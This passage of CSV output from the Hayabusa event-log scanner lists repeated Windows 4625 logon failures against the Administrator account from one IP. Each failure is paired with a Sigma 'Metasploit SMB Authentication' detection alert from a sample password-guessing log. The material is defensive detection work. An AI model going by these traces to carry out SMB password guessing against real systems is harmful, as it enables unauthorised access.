Password,User: Administrator : Type: 3 : Workstation: daKQcllU63lW4ypy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBSPSAoEBS7JRYuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94bI5pb8CGjY3QZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1obedLuMFlHlSvA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EPn1yJV358YAFALV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qA7N5DMAJqNYkumM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Lk95NYGG5iLBFBw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3DDtXECsK61pIYy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rt8bfBDTV5wYfBO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uTYMgN5kmFpyj7xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RmyF6j61wosCE0sg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fd61fJBRizl2AIGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDIFX7lsmGqSGvkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVmto6S25gU2bkwa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7QMbzSuGuzzMK0v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJUynF5bN1Oj0vaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dg4ZtybY5BnPN0nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gRmRV9ct3hor8Muk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QRjaP1mj9FgKsGBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CCzzatQ195mcxQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QJPIrtk5GBAhsUlR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 720RHwyXQcxvsJBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GofmHRstuhljMDOL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wQUQ4INktwXwRkaY : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WHs5hduf7SmUcLK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gdo1txjJXiRLbUDH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JK8jP3ftKQOyutGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdbEjo88dBJRhrKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZCVkXkwhbuSM654 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z2mc9WScfBa88rtO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Lee7qYLkXQoz8rRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g1ZKpZuZU1WRoC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4ST7RrHJxAQHHbn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GtW1hBHF97YqvN4N : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVKlPytPofO9LQBm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GOkZ9yjvfL51UYXo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAxfxSbRqGO7Dej0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D7XmvDYk6zFLir09 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mWcl6CKdSMxd8edZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SxBQlFZvGBqDdobn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AXN94VanwME6q8rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOj7CZ3stJXePY8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXjmqxguFGL3f8cV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHWmdxnRrMbxrdlN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ROBnjuyHn4FRugk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zGxuUxasL680O21l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYoM984EzAkUtBoa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
